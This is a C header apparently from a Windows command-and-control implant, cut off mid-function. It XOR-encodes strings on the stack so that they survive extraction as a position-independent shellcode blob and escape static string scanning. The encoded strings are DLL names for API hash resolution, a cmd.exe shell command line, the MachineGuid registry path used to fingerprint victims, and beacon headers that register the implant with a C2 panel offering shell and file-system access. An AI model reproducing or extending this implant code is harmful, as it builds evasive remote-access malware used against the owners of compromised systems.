/* stackstrings.h - module names built on the stack, no .rdata literals.
 *
 * Why: every string literal the compiler emits lands in .rdata; when
 * .text is later extracted as a raw blob, RIP-relative addresses into
 * .rdata point past the end of the blob and the first read faults
 * (proven live by .local-tests/blob_loader.c).
 *
 * Form (notes/STRINGS.md par.4): each element of the name is stored as
 * an ENCODED immediate (plain ^ key) and DECODED inside the write -
 * buf[i] = (ENC ^ key). Two rules make it work:
 *   - the key is a VOLATILE local: a macro/plain constant would let the
 *     compiler fold ENC^key back into a plaintext immediate, defeating
 *     the XOR entirely;
 *   - one pass, no separate xor loop over the buffer (a separate loop
 *     vectorizes at -O2 and the SSE key splat goes back to .rdata).
 *
 * Generated by a script (lengths and encodings are machine-computed);
 * the oracle .local-tests/hash_resolve_oracle.c verifies every builder
 * against the real name at runtime - a wrong byte resolves NULL and the
 * oracle fails loud. The decode must live INSIDE each write: storing
 * ciphertext without XOR-ing it back yields a garbage module name and
 * the agent dies at "Failed to resolve the WinHTTP table".
 */

#pragma once
#include "types.h"
#include "wintypes.h"   /* UNICODE_STRING */

#define STACKSTR_KEY_KERNEL32 0x5A

#define STACKSTR_KEY_NTDLL 0x3C

#define STACKSTR_KEY_ADVAPI32 0xA7

#define STACKSTR_KEY_WINHTTP 0x71


/* L"kernel32.dll" - 12 chars + NUL. */
static VOID StrKernel32(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_KERNEL32;
    buf[0] = (WCHAR)(0x31u ^ key); /* 'k' */
    buf[1] = (WCHAR)(0x3Fu ^ key); /* 'e' */
    buf[2] = (WCHAR)(0x28u ^ key); /* 'r' */
    buf[3] = (WCHAR)(0x34u ^ key); /* 'n' */
    buf[4] = (WCHAR)(0x3Fu ^ key); /* 'e' */
    buf[5] = (WCHAR)(0x36u ^ key); /* 'l' */
    buf[6] = (WCHAR)(0x69u ^ key); /* '3' */
    buf[7] = (WCHAR)(0x68u ^ key); /* '2' */
    buf[8] = (WCHAR)(0x74u ^ key); /* '.' */
    buf[9] = (WCHAR)(0x3Eu ^ key); /* 'd' */
    buf[10] = (WCHAR)(0x36u ^ key); /* 'l' */
    buf[11] = (WCHAR)(0x36u ^ key); /* 'l' */
    buf[12] = 0;
}

#define STRLEN_BYTES_KERNEL32 24   /* 12 chars * 2 */

/* L"ntdll.dll" - 9 chars + NUL. */
static VOID StrNtdll(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_NTDLL;
    buf[0] = (WCHAR)(0x52u ^ key); /* 'n' */
    buf[1] = (WCHAR)(0x48u ^ key); /* 't' */
    buf[2] = (WCHAR)(0x58u ^ key); /* 'd' */
    buf[3] = (WCHAR)(0x50u ^ key); /* 'l' */
    buf[4] = (WCHAR)(0x50u ^ key); /* 'l' */
    buf[5] = (WCHAR)(0x12u ^ key); /* '.' */
    buf[6] = (WCHAR)(0x58u ^ key); /* 'd' */
    buf[7] = (WCHAR)(0x50u ^ key); /* 'l' */
    buf[8] = (WCHAR)(0x50u ^ key); /* 'l' */
    buf[9] = 0;
}

#define STRLEN_BYTES_NTDLL 18   /* 9 chars * 2 */

/* L"advapi32.dll" - 12 chars + NUL. */
static VOID StrAdvapi32(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_ADVAPI32;
    buf[0] = (WCHAR)(0xC6u ^ key); /* 'a' */
    buf[1] = (WCHAR)(0xC3u ^ key); /* 'd' */
    buf[2] = (WCHAR)(0xD1u ^ key); /* 'v' */
    buf[3] = (WCHAR)(0xC6u ^ key); /* 'a' */
    buf[4] = (WCHAR)(0xD7u ^ key); /* 'p' */
    buf[5] = (WCHAR)(0xCEu ^ key); /* 'i' */
    buf[6] = (WCHAR)(0x94u ^ key); /* '3' */
    buf[7] = (WCHAR)(0x95u ^ key); /* '2' */
    buf[8] = (WCHAR)(0x89u ^ key); /* '.' */
    buf[9] = (WCHAR)(0xC3u ^ key); /* 'd' */
    buf[10] = (WCHAR)(0xCBu ^ key); /* 'l' */
    buf[11] = (WCHAR)(0xCBu ^ key); /* 'l' */
    buf[12] = 0;
}

#define STRLEN_BYTES_ADVAPI32 24   /* 12 chars * 2 */

/* L"winhttp.dll" - 11 chars + NUL. */
static VOID StrWinhttp(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_WINHTTP;
    buf[0] = (WCHAR)(0x06u ^ key); /* 'w' */
    buf[1] = (WCHAR)(0x18u ^ key); /* 'i' */
    buf[2] = (WCHAR)(0x1Fu ^ key); /* 'n' */
    buf[3] = (WCHAR)(0x19u ^ key); /* 'h' */
    buf[4] = (WCHAR)(0x05u ^ key); /* 't' */
    buf[5] = (WCHAR)(0x05u ^ key); /* 't' */
    buf[6] = (WCHAR)(0x01u ^ key); /* 'p' */
    buf[7] = (WCHAR)(0x5Fu ^ key); /* '.' */
    buf[8] = (WCHAR)(0x15u ^ key); /* 'd' */
    buf[9] = (WCHAR)(0x1Du ^ key); /* 'l' */
    buf[10] = (WCHAR)(0x1Du ^ key); /* 'l' */
    buf[11] = 0;
}

#define STRLEN_BYTES_WINHTTP 22   /* 11 chars * 2 */

/* ---- Functional strings (needed at runtime, not diagnostics) ---- */
#define STACKSTR_KEY_WIN 0x6B
#define STACKSTR_KEY_UA 0xC3
#define STACKSTR_KEY_CMD 0x94
#define STACKSTR_KEY_REG 0x37
#define STACKSTR_KEY_GUID 0x5D

/* "Windows" - 7 chars + NUL. */
static VOID StrPlatformWindows(PCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_WIN;
    buf[0] = (CHAR)(0x3Cu ^ key); /* W */
    buf[1] = (CHAR)(0x02u ^ key); /* i */
    buf[2] = (CHAR)(0x05u ^ key); /* n */
    buf[3] = (CHAR)(0x0Fu ^ key); /* d */
    buf[4] = (CHAR)(0x04u ^ key); /* o */
    buf[5] = (CHAR)(0x1Cu ^ key); /* w */
    buf[6] = (CHAR)(0x18u ^ key); /* s */
    buf[7] = 0;
}

#define STRLEN_BYTES_PLATFORMWINDOWS 7

/* L"minimal_agent/1.0" - 17 chars + NUL. */
static VOID StrUserAgent(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_UA;
    buf[0] = (WCHAR)(0xAEu ^ key); /* m */
    buf[1] = (WCHAR)(0xAAu ^ key); /* i */
    buf[2] = (WCHAR)(0xADu ^ key); /* n */
    buf[3] = (WCHAR)(0xAAu ^ key); /* i */
    buf[4] = (WCHAR)(0xAEu ^ key); /* m */
    buf[5] = (WCHAR)(0xA2u ^ key); /* a */
    buf[6] = (WCHAR)(0xAFu ^ key); /* l */
    buf[7] = (WCHAR)(0x9Cu ^ key); /* _ */
    buf[8] = (WCHAR)(0xA2u ^ key); /* a */
    buf[9] = (WCHAR)(0xA4u ^ key); /* g */
    buf[10] = (WCHAR)(0xA6u ^ key); /* e */
    buf[11] = (WCHAR)(0xADu ^ key); /* n */
    buf[12] = (WCHAR)(0xB7u ^ key); /* t */
    buf[13] = (WCHAR)(0xECu ^ key); /* / */
    buf[14] = (WCHAR)(0xF2u ^ key); /* 1 */
    buf[15] = (WCHAR)(0xEDu ^ key); /* . */
    buf[16] = (WCHAR)(0xF3u ^ key); /* 0 */
    buf[17] = 0;
}

#define STRLEN_BYTES_USERAGENT 17

/* L"cmd.exe /K chcp 65001 >nul" - 26 chars + NUL. */
static VOID StrCmdline(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_CMD;
    buf[0] = (WCHAR)(0xF7u ^ key); /* c */
    buf[1] = (WCHAR)(0xF9u ^ key); /* m */
    buf[2] = (WCHAR)(0xF0u ^ key); /* d */
    buf[3] = (WCHAR)(0xBAu ^ key); /* . */
    buf[4] = (WCHAR)(0xF1u ^ key); /* e */
    buf[5] = (WCHAR)(0xECu ^ key); /* x */
    buf[6] = (WCHAR)(0xF1u ^ key); /* e */
    buf[7] = (WCHAR)(0xB4u ^ key); /*   */
    buf[8] = (WCHAR)(0xBBu ^ key); /* / */
    buf[9] = (WCHAR)(0xDFu ^ key); /* K */
    buf[10] = (WCHAR)(0xB4u ^ key); /*   */
    buf[11] = (WCHAR)(0xF7u ^ key); /* c */
    buf[12] = (WCHAR)(0xFCu ^ key); /* h */
    buf[13] = (WCHAR)(0xF7u ^ key); /* c */
    buf[14] = (WCHAR)(0xE4u ^ key); /* p */
    buf[15] = (WCHAR)(0xB4u ^ key); /*   */
    buf[16] = (WCHAR)(0xA2u ^ key); /* 6 */
    buf[17] = (WCHAR)(0xA1u ^ key); /* 5 */
    buf[18] = (WCHAR)(0xA4u ^ key); /* 0 */
    buf[19] = (WCHAR)(0xA4u ^ key); /* 0 */
    buf[20] = (WCHAR)(0xA5u ^ key); /* 1 */
    buf[21] = (WCHAR)(0xB4u ^ key); /*   */
    buf[22] = (WCHAR)(0xAAu ^ key); /* > */
    buf[23] = (WCHAR)(0xFAu ^ key); /* n */
    buf[24] = (WCHAR)(0xE1u ^ key); /* u */
    buf[25] = (WCHAR)(0xF8u ^ key); /* l */
    buf[26] = 0;
}

#define STRLEN_BYTES_CMDLINE 26

/* "SOFTWARE\Microsoft\Cryptography" - 31 chars + NUL. */
static VOID StrRegPath(PCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_REG;
    buf[0] = (CHAR)(0x64u ^ key); /* S */
    buf[1] = (CHAR)(0x78u ^ key); /* O */
    buf[2] = (CHAR)(0x71u ^ key); /* F */
    buf[3] = (CHAR)(0x63u ^ key); /* T */
    buf[4] = (CHAR)(0x60u ^ key); /* W */
    buf[5] = (CHAR)(0x76u ^ key); /* A */
    buf[6] = (CHAR)(0x65u ^ key); /* R */
    buf[7] = (CHAR)(0x72u ^ key); /* E */
    buf[8] = (CHAR)(0x6Bu ^ key); /* slash */
    buf[9] = (CHAR)(0x7Au ^ key); /* M */
    buf[10] = (CHAR)(0x5Eu ^ key); /* i */
    buf[11] = (CHAR)(0x54u ^ key); /* c */
    buf[12] = (CHAR)(0x45u ^ key); /* r */
    buf[13] = (CHAR)(0x58u ^ key); /* o */
    buf[14] = (CHAR)(0x44u ^ key); /* s */
    buf[15] = (CHAR)(0x58u ^ key); /* o */
    buf[16] = (CHAR)(0x51u ^ key); /* f */
    buf[17] = (CHAR)(0x43u ^ key); /* t */
    buf[18] = (CHAR)(0x6Bu ^ key); /* slash */
    buf[19] = (CHAR)(0x74u ^ key); /* C */
    buf[20] = (CHAR)(0x45u ^ key); /* r */
    buf[21] = (CHAR)(0x4Eu ^ key); /* y */
    buf[22] = (CHAR)(0x47u ^ key); /* p */
    buf[23] = (CHAR)(0x43u ^ key); /* t */
    buf[24] = (CHAR)(0x58u ^ key); /* o */
    buf[25] = (CHAR)(0x50u ^ key); /* g */
    buf[26] = (CHAR)(0x45u ^ key); /* r */
    buf[27] = (CHAR)(0x56u ^ key); /* a */
    buf[28] = (CHAR)(0x47u ^ key); /* p */
    buf[29] = (CHAR)(0x5Fu ^ key); /* h */
    buf[30] = (CHAR)(0x4Eu ^ key); /* y */
    buf[31] = 0;
}

#define STRLEN_BYTES_REGPATH 31

/* "MachineGuid" - 11 chars + NUL. */
static VOID StrMachineGuid(PCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_GUID;
    buf[0] = (CHAR)(0x10u ^ key); /* M */
    buf[1] = (CHAR)(0x3Cu ^ key); /* a */
    buf[2] = (CHAR)(0x3Eu ^ key); /* c */
    buf[3] = (CHAR)(0x35u ^ key); /* h */
    buf[4] = (CHAR)(0x34u ^ key); /* i */
    buf[5] = (CHAR)(0x33u ^ key); /* n */
    buf[6] = (CHAR)(0x38u ^ key); /* e */
    buf[7] = (CHAR)(0x1Au ^ key); /* G */
    buf[8] = (CHAR)(0x28u ^ key); /* u */
    buf[9] = (CHAR)(0x34u ^ key); /* i */
    buf[10] = (CHAR)(0x39u ^ key); /* d */
    buf[11] = 0;
}

#define STRLEN_BYTES_MACHINEGUID 11
#define STACKSTR_KEY_HASH 0x4E

/* "course01" - the local-build commit tag for the identity frame. */
static VOID StrCommitDefault(PCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_HASH;
    buf[0] = (CHAR)(0x2Du ^ key); /* c */
    buf[1] = (CHAR)(0x21u ^ key); /* o */
    buf[2] = (CHAR)(0x3Bu ^ key); /* u */
    buf[3] = (CHAR)(0x3Cu ^ key); /* r */
    buf[4] = (CHAR)(0x3Du ^ key); /* s */
    buf[5] = (CHAR)(0x2Bu ^ key); /* e */
    buf[6] = (CHAR)(0x7Eu ^ key); /* 0 */
    buf[7] = (CHAR)(0x7Fu ^ key); /* 1 */
    buf[8] = 0;
}
#define STACKSTR_KEY_X64 0x2D

/* "x64" - architecture field of the identity frame. */
static VOID StrX64(PCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_X64;
    buf[0] = (CHAR)(0x55u ^ key); /* x */
    buf[1] = (CHAR)(0x1Bu ^ key); /* 6 */
    buf[2] = (CHAR)(0x19u ^ key); /* 4 */
    buf[3] = 0;
}

#define STACKSTR_KEY_X86 0xE1

/* "x86" - architecture field of the identity frame (32-bit builds). */
static VOID StrX86(PCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_X86;
    buf[0] = (CHAR)(0x99u ^ key); /* x */
    buf[1] = (CHAR)(0xD9u ^ key); /* 8 */
    buf[2] = (CHAR)(0xD7u ^ key); /* 6 */
    buf[3] = 0;
}

#define STACKSTR_KEY_GET 0x7A

/* "GET" - the HTTP method of the upgrade request. */
static VOID StrGetMethod(PCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_GET;
    buf[0] = (CHAR)(0x3Du ^ key); /* G */
    buf[1] = (CHAR)(0x3Fu ^ key); /* E */
    buf[2] = (CHAR)(0x2Eu ^ key); /* T */
    buf[3] = 0;
}
#define STACKSTR_KEY_GETW 0x7A

/* L"GET" - the HTTP method (wide, as WinHttpOpenRequest wants). */
static VOID StrGetMethodW(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_GETW;
    buf[0] = (WCHAR)(0x3Du ^ key); /* G */
    buf[1] = (WCHAR)(0x3Fu ^ key); /* E */
    buf[2] = (WCHAR)(0x2Eu ^ key); /* T */
    buf[3] = 0;
}

/* ==========================================================================
 * X-Agent-* identity headers (API 1 - C2 docs/05-relay-protocol.md §5,
 * docs/13-agent-implementation.md §4).
 *
 * Identity no longer travels as a Hello binary frame: the relay copies the
 * upgrade request's X-Agent-* headers into agent_connected / the agents
 * snapshot, and the C2 registers ONLY agents whose Api-Version is 1 and
 * whose Machine-Uuid parses as a C# Guid - without the headers the agent
 * connects but never appears in the panel (its shell/FS windows never open:
 * no UUID to key them on). Header VALUES must be printable ASCII, one
 * header per line, CRLF-terminated.
 *
 * Generated by the same recipe as every builder above (encoded immediates,
 * volatile key, decode inside the write - no .rdata literal survives).
 * ======================================================================== */

/* "X-Agent-Api-Version: 1\r\n" - required; the C2 registers only ApiVersion 1 */
static VOID StrHdrApiVersion(PCHAR buf)
{
    volatile UINT32 key = 0x6B;
    buf[0] = (CHAR)(0x33u ^ key); /* 'X' */
    buf[1] = (CHAR)(0x46u ^ key); /* '-' */
    buf[2] = (CHAR)(0x2Au ^ key); /* 'A' */
    buf[3] = (CHAR)(0x0Cu ^ key); /* 'g' */
    buf[4] = (CHAR)(0x0Eu ^ key); /* 'e' */
    buf[5] = (CHAR)(0x05u ^ key); /* 'n' */
    buf[6] = (CHAR)(0x1Fu ^ key); /* 't' */
    buf[7] = (CHAR)(0x46u ^ key); /* '-' */
    buf[8] = (CHAR)(0x2Au ^ key); /* 'A' */
    buf[9] = (CHAR)(0x1Bu ^ key); /* 'p' */
    buf[10] = (CHAR)(0x02u ^ key); /* 'i' */
    buf[11] = (CHAR)(0x46u ^ key); /* '-' */
    buf[12] = (CHAR)(0x3Du ^ key); /* 'V' */
    buf[13] = (CHAR)(0x0Eu ^ key); /* 'e' */
    buf[14] = (CHAR)(0x19u ^ key); /* 'r' */
    buf[15] = (CHAR)(0x18u ^ key); /* 's' */
    buf[16] = (CHAR)(0x02u ^ key); /* 'i' */
    buf[17] = (CHAR)(0x04u ^ key); /* 'o' */
    buf[18] = (CHAR)(0x05u ^ key); /* 'n' */
    buf[19] = (CHAR)(0x51u ^ key); /* ':' */
    buf[20] = (CHAR)(0x4Bu ^ key); /* ' ' */
    buf[21] = (CHAR)(0x5Au ^ key); /* '1' */
    buf[22] = (CHAR)(0x66u ^ key); /* '\r' */
    buf[23] = (CHAR)(0x61u ^ key); /* '\n' */
    buf[24] = 0;
}

/* "X-Agent-Name-Id: 4\r\n" - breed 4 = this agent (unregistered ids display "Unknown (4)") */
static VOID StrHdrNameId(PCHAR buf)
{
    volatile UINT32 key = 0x39;
    buf[0] = (CHAR)(0x61u ^ key); /* 'X' */
    buf[1] = (CHAR)(0x14u ^ key); /* '-' */
    buf[2] = (CHAR)(0x78u ^ key); /* 'A' */
    buf[3] = (CHAR)(0x5Eu ^ key); /* 'g' */
    buf[4] = (CHAR)(0x5Cu ^ key); /* 'e' */
    buf[5] = (CHAR)(0x57u ^ key); /* 'n' */
    buf[6] = (CHAR)(0x4Du ^ key); /* 't' */
    buf[7] = (CHAR)(0x14u ^ key); /* '-' */
    buf[8] = (CHAR)(0x77u ^ key); /* 'N' */
    buf[9] = (CHAR)(0x58u ^ key); /* 'a' */
    buf[10] = (CHAR)(0x54u ^ key); /* 'm' */
    buf[11] = (CHAR)(0x5Cu ^ key); /* 'e' */
    buf[12] = (CHAR)(0x14u ^ key); /* '-' */
    buf[13] = (CHAR)(0x70u ^ key); /* 'I' */
    buf[14] = (CHAR)(0x5Du ^ key); /* 'd' */
    buf[15] = (CHAR)(0x03u ^ key); /* ':' */
    buf[16] = (CHAR)(0x19u ^ key); /* ' ' */
    buf[17] = (CHAR)(0x0Du ^ key); /* '4' */
    buf[18] = (CHAR)(0x34u ^ key); /* '\r' */
    buf[19] = (CHAR)(0x33u ^ key); /* '\n' */
    buf[20] = 0;
}

/* "X-Agent-Platform: windows\r\n" - required compile-time platform */
static VOID StrHdrPlatform(PCHAR buf)
{
    volatile UINT32 key = 0x52;
    buf[0] = (CHAR)(0x0Au ^ key); /* 'X' */
    buf[1] = (CHAR)(0x7Fu ^ key); /* '-' */
    buf[2] = (CHAR)(0x13u ^ key); /* 'A' */
    buf[3] = (CHAR)(0x35u ^ key); /* 'g' */
    buf[4] = (CHAR)(0x37u ^ key); /* 'e' */
    buf[5] = (CHAR)(0x3Cu ^ key); /* 'n' */
    buf[6] = (CHAR)(0x26u ^ key); /* 't' */
    buf[7] = (CHAR)(0x7Fu ^ key); /* '-' */
    buf[8] = (CHAR)(0x02u ^ key); /* 'P' */
    buf[9] = (CHAR)(0x3Eu ^ key); /* 'l' */
    buf[10] = (CHAR)(0x33u ^ key); /* 'a' */
    buf[11] = (CHAR)(0x26u ^ key); /* 't' */
    buf[12] = (CHAR)(0x34u ^ key); /* 'f' */
    buf[13] = (CHAR)(0x3Du ^ key); /* 'o' */
    buf[14] = (CHAR)(0x20u ^ key); /* 'r' */
    buf[15] = (CHAR)(0x3Fu ^ key); /* 'm' */
    buf[16] = (CHAR)(0x68u ^ key); /* ':' */
    buf[17] = (CHAR)(0x72u ^ key); /* ' ' */
    buf[18] = (CHAR)(0x25u ^ key); /* 'w' */
    buf[19] = (CHAR)(0x3Bu ^ key); /* 'i' */
    buf[20] = (CHAR)(0x3Cu ^ key); /* 'n' */
    buf[21] = (CHAR)(0x36u ^ key); /* 'd' */
    buf[22] = (CHAR)(0x3Du ^ key); /* 'o' */
    buf[23] = (CHAR)(0x25u ^ key); /* 'w' */
    buf[24] = (CHAR)(0x21u ^ key); /* 's' */
    buf[25] = (CHAR)(0x5Fu ^ key); /* '\r' */
    buf[26] = (CHAR)(0x58u ^ key); /* '\n' */
    buf[27] = 0;
}

/* "X-Agent-Capabilities: 0100000000000000\r\n" - bit 0 = Shell (16 lowercase hex, byte 0 first) */
static VOID StrHdrCaps(PCHAR buf)
{
    volatile UINT32 key = 0x7D;
    buf[0] = (CHAR)(0x25u ^ key); /* 'X' */
    buf[1] = (CHAR)(0x50u ^ key); /* '-' */
    buf[2] = (CHAR)(0x3Cu ^ key); /* 'A' */
    buf[3] = (CHAR)(0x1Au ^ key); /* 'g' */
    buf[4] = (CHAR)(0x18u ^ key); /* 'e' */
    buf[5] = (CHAR)(0x13u ^ key); /* 'n' */
    buf[6] = (CHAR)(0x09u ^ key); /* 't' */
    buf[7] = (CHAR)(0x50u ^ key); /* '-' */
    buf[8] = (CHAR)(0x3Eu ^ key); /* 'C' */
    buf[9] = (CHAR)(0x1Cu ^ key); /* 'a' */
    buf[10] = (CHAR)(0x0Du ^ key); /* 'p' */
    buf[11] = (CHAR)(0x1Cu ^ key); /* 'a' */
    buf[12] = (CHAR)(0x1Fu ^ key); /* 'b' */
    buf[13] = (CHAR)(0x14u ^ key); /* 'i' */
    buf[14] = (CHAR)(0x11u ^ key); /* 'l' */
    buf[15] = (CHAR)(0x14u ^ key); /* 'i' */
    buf[16] = (CHAR)(0x09u ^ key); /* 't' */
    buf[17] = (CHAR)(0x14u ^ key); /* 'i' */
    buf[18] = (CHAR)(0x18u ^ key); /* 'e' */
    buf[19] = (CHAR)(0x0Eu ^ key); /* 's' */
    buf[20] = (CHAR)(0x47u ^ key); /* ':' */
    buf[21] = (CHAR)(0x5Du ^ key); /* ' ' */
    buf[22] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[23] = (CHAR)(0x4Cu ^ key); /* '1' */
    buf[24] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[25] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[26] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[27] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[28] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[29] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[30] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[31] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[32] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[33] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[34] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[35] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[36] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[37] = (CHAR)(0x4Du ^ key); /* '0' */
    buf[38] = (CHAR)(0x70u ^ key); /* '\r' */
    buf[39] = (CHAR)(0x77u ^ key); /* '\n' */
    buf[40] = 0;
}

/* "X-Agent-Machine-Uuid: " label - the registry Guid text follows */
static VOID StrLblUuid(PCHAR buf)
{
    volatile UINT32 key = 0x1F;
    buf[0] = (CHAR)(0x47u ^ key); /* 'X' */
    buf[1] = (CHAR)(0x32u ^ key); /* '-' */
    buf[2] = (CHAR)(0x5Eu ^ key); /* 'A' */
    buf[3] = (CHAR)(0x78u ^ key); /* 'g' */
    buf[4] = (CHAR)(0x7Au ^ key); /* 'e' */
    buf[5] = (CHAR)(0x71u ^ key); /* 'n' */
    buf[6] = (CHAR)(0x6Bu ^ key); /* 't' */
    buf[7] = (CHAR)(0x32u ^ key); /* '-' */
    buf[8] = (CHAR)(0x52u ^ key); /* 'M' */
    buf[9] = (CHAR)(0x7Eu ^ key); /* 'a' */
    buf[10] = (CHAR)(0x7Cu ^ key); /* 'c' */
    buf[11] = (CHAR)(0x77u ^ key); /* 'h' */
    buf[12] = (CHAR)(0x76u ^ key); /* 'i' */
    buf[13] = (CHAR)(0x71u ^ key); /* 'n' */
    buf[14] = (CHAR)(0x7Au ^ key); /* 'e' */
    buf[15] = (CHAR)(0x32u ^ key); /* '-' */
    buf[16] = (CHAR)(0x4Au ^ key); /* 'U' */
    buf[17] = (CHAR)(0x6Au ^ key); /* 'u' */
    buf[18] = (CHAR)(0x76u ^ key); /* 'i' */
    buf[19] = (CHAR)(0x7Bu ^ key); /* 'd' */
    buf[20] = (CHAR)(0x25u ^ key); /* ':' */
    buf[21] = (CHAR)(0x3Fu ^ key); /* ' ' */
    buf[22] = 0;
}

/* "X-Agent-Hostname: " label */
static VOID StrLblHostname(PCHAR buf)
{
    volatile UINT32 key = 0x64;
    buf[0] = (CHAR)(0x3Cu ^ key); /* 'X' */
    buf[1] = (CHAR)(0x49u ^ key); /* '-' */
    buf[2] = (CHAR)(0x25u ^ key); /* 'A' */
    buf[3] = (CHAR)(0x03u ^ key); /* 'g' */
    buf[4] = (CHAR)(0x01u ^ key); /* 'e' */
    buf[5] = (CHAR)(0x0Au ^ key); /* 'n' */
    buf[6] = (CHAR)(0x10u ^ key); /* 't' */
    buf[7] = (CHAR)(0x49u ^ key); /* '-' */
    buf[8] = (CHAR)(0x2Cu ^ key); /* 'H' */
    buf[9] = (CHAR)(0x0Bu ^ key); /* 'o' */
    buf[10] = (CHAR)(0x17u ^ key); /* 's' */
    buf[11] = (CHAR)(0x10u ^ key); /* 't' */
    buf[12] = (CHAR)(0x0Au ^ key); /* 'n' */
    buf[13] = (CHAR)(0x05u ^ key); /* 'a' */
    buf[14] = (CHAR)(0x09u ^ key); /* 'm' */
    buf[15] = (CHAR)(0x01u ^ key); /* 'e' */
    buf[16] = (CHAR)(0x5Eu ^ key); /* ':' */
    buf[17] = (CHAR)(0x44u ^ key); /* ' ' */
    buf[18] = 0;
}

/* "X-Agent-Username: " label */
static VOID StrLblUsername(PCHAR buf)
{
    volatile UINT32 key = 0x2A;
    buf[0] = (CHAR)(0x72u ^ key); /* 'X' */
    buf[1] = (CHAR)(0x07u ^ key); /* '-' */
    buf[2] = (CHAR)(0x6Bu ^ key); /* 'A' */
    buf[3] = (CHAR)(0x4Du ^ key); /* 'g' */
    buf[4] = (CHAR)(0x4Fu ^ key); /* 'e' */
    buf[5] = (CHAR)(0x44u ^ key); /* 'n' */
    buf[6] = (CHAR)(0x5Eu ^ key); /* 't' */
    buf[7] = (CHAR)(0x07u ^ key); /* '-' */
    buf[8] = (CHAR)(0x7Fu ^ key); /* 'U' */
    buf[9] = (CHAR)(0x59u ^ key); /* 's' */
    buf[10] = (CHAR)(0x4Fu ^ key); /* 'e' */
    buf[11] = (CHAR)(0x58u ^ key); /* 'r' */
    buf[12] = (CHAR)(0x44u ^ key); /* 'n' */
    buf[13] = (CHAR)(0x4Bu ^ key); /* 'a' */
    buf[14] = (CHAR)(0x47u ^ key); /* 'm' */
    buf[15] = (CHAR)(0x4Fu ^ key); /* 'e' */
    buf[16] = (CHAR)(0x10u ^ key); /* ':' */
    buf[17] = (CHAR)(0x0Au ^ key); /* ' ' */
    buf[18] = 0;
}

/* "X-Agent-Os-Version: " label */
static VOID StrLblOsVersion(PCHAR buf)
{
    volatile UINT32 key = 0x53;
    buf[0] = (CHAR)(0x0Bu ^ key); /* 'X' */
    buf[1] = (CHAR)(0x7Eu ^ key); /* '-' */
    buf[2] = (CHAR)(0x12u ^ key); /* 'A' */
    buf[3] = (CHAR)(0x34u ^ key); /* 'g' */
    buf[4] = (CHAR)(0x36u ^ key); /* 'e' */
    buf[5] = (CHAR)(0x3Du ^ key); /* 'n' */
    buf[6] = (CHAR)(0x27u ^ key); /* 't' */
    buf[7] = (CHAR)(0x7Eu ^ key); /* '-' */
    buf[8] = (CHAR)(0x1Cu ^ key); /* 'O' */
    buf[9] = (CHAR)(0x20u ^ key); /* 's' */
    buf[10] = (CHAR)(0x7Eu ^ key); /* '-' */
    buf[11] = (CHAR)(0x05u ^ key); /* 'V' */
    buf[12] = (CHAR)(0x36u ^ key); /* 'e' */
    buf[13] = (CHAR)(0x21u ^ key); /* 'r' */
    buf[14] = (CHAR)(0x20u ^ key); /* 's' */
    buf[15] = (CHAR)(0x3Au ^ key); /* 'i' */
    buf[16] = (CHAR)(0x3Cu ^ key); /* 'o' */
    buf[17] = (CHAR)(0x3Du ^ key); /* 'n' */
    buf[18] = (CHAR)(0x69u ^ key); /* ':' */
    buf[19] = (CHAR)(0x73u ^ key); /* ' ' */
    buf[20] = 0;
}

/* "X-Agent-Build: " label - decimal build number follows */
static VOID StrLblBuild(PCHAR buf)
{
    volatile UINT32 key = 0x30;
    buf[0] = (CHAR)(0x68u ^ key); /* 'X' */
    buf[1] = (CHAR)(0x1Du ^ key); /* '-' */
    buf[2] = (CHAR)(0x71u ^ key); /* 'A' */
    buf[3] = (CHAR)(0x57u ^ key); /* 'g' */
    buf[4] = (CHAR)(0x55u ^ key); /* 'e' */
    buf[5] = (CHAR)(0x5Eu ^ key); /* 'n' */
    buf[6] = (CHAR)(0x44u ^ key); /* 't' */
    buf[7] = (CHAR)(0x1Du ^ key); /* '-' */
    buf[8] = (CHAR)(0x72u ^ key); /* 'B' */
    buf[9] = (CHAR)(0x45u ^ key); /* 'u' */
    buf[10] = (CHAR)(0x59u ^ key); /* 'i' */
    buf[11] = (CHAR)(0x5Cu ^ key); /* 'l' */
    buf[12] = (CHAR)(0x54u ^ key); /* 'd' */
    buf[13] = (CHAR)(0x0Au ^ key); /* ':' */
    buf[14] = (CHAR)(0x10u ^ key); /* ' ' */
    buf[15] = 0;
}

/* "X-Agent-Commit: " label - 8-char tag follows */
static VOID StrLblCommit(PCHAR buf)
{
    volatile UINT32 key = 0x5B;
    buf[0] = (CHAR)(0x03u ^ key); /* 'X' */
    buf[1] = (CHAR)(0x76u ^ key); /* '-' */
    buf[2] = (CHAR)(0x1Au ^ key); /* 'A' */
    buf[3] = (CHAR)(0x3Cu ^ key); /* 'g' */
    buf[4] = (CHAR)(0x3Eu ^ key); /* 'e' */
    buf[5] = (CHAR)(0x35u ^ key); /* 'n' */
    buf[6] = (CHAR)(0x2Fu ^ key); /* 't' */
    buf[7] = (CHAR)(0x76u ^ key); /* '-' */
    buf[8] = (CHAR)(0x18u ^ key); /* 'C' */
